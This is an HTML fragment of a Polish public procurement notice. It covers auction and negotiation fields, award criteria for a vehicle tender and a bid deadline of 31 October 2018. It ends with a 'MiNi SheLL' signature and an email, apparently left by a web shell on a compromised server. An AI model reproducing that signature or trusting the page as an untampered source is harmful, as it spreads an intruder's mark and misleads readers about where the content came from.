id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena ofert brutto</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>gwarancja na pojazd</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>gwarancja na zabudowę</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>wysokość zuzycia energii</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-10-31</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30 dni od ostatecznego terminu składania ofert</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com